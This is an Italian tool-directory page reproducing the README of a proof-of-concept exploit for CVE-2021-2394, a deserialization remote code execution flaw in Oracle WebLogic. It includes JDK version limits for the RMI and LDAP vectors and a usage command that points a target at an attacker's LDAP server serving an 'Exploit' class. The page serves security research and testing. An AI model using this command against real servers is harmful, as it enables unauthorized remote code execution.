Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-2394 — Proof-of-concept exploit per CVE-2021-2394, una vulnerabilità di esecuzione remota di codice in Oracle WebLogic Server. Utilizza la deserializzazione LDAP o RMI per consegnare un payload. | Kitploit
Strumenti/GitHubGitHub/lz2y/cve-2021-2394
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHublz2y/cve-2021-2394

CVE-2021-2394

Proof-of-concept exploit per CVE-2021-2394, una vulnerabilità di esecuzione remota di codice in Oracle WebLogic Server. Utilizza la deserializzazione LDAP o RMI per consegnare un payload.

Vedi Repository
402014 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-2394

POC di CVE-2021-2394

  • Disclaimer
    • Il progetto è destinato esclusivamente all'apprendimento; qualsiasi conseguenza o perdita, diretta o indiretta, causata da test non autorizzati, è di esclusiva responsabilità dell'utente stesso.
  • Note

    • Il POC invia i pacchetti tramite IIOP; aggiungere le relative dipendenze (le dipendenze della versione 12.2.1.3.0 sono già state inserite nella release)
    • Per i test, installare WebLogic utilizzando una versione precedente del JDK

      Il metodo di sfruttamento basato su RMI è limitato alle versioni JDK precedenti a 6u132, 7u131, 8u121; nelle versioni 8u122 e successive è stato aggiunto il meccanismo della whitelist di deserializzazione, disattivando il caricamento remoto del codice RMI. Il metodo di sfruttamento basato su LDAP è limitato alle versioni JDK precedenti a 6u211, 7u201, 8u191, 11.0.1; nella versione 8u191, Oracle ha imposto limitazioni al vettore LDAP, pubblicando CVE-2018-3149 e disattivando il caricamento remoto delle classi JNDI. Fonte: https://www.freebuf.com/vuls/279465.html

    • Se non è possibile riprodurlo in un ambiente virtuale, fare riferimento a https://xz.aliyun.com/t/7498
  • Utilizzo:

    • Avviare un servizio LDAP
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • es.:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Link di riferimento:

https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
  • https://github.com/Y4er/CVE-2020-14756
  • https://github.com/Y4er/CVE-2020-2551
  • Aggiornamenti

    • 2021/8/15 Rimosso del codice non necessario
  • Articolo di analisi

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
  • Scarica lo strumento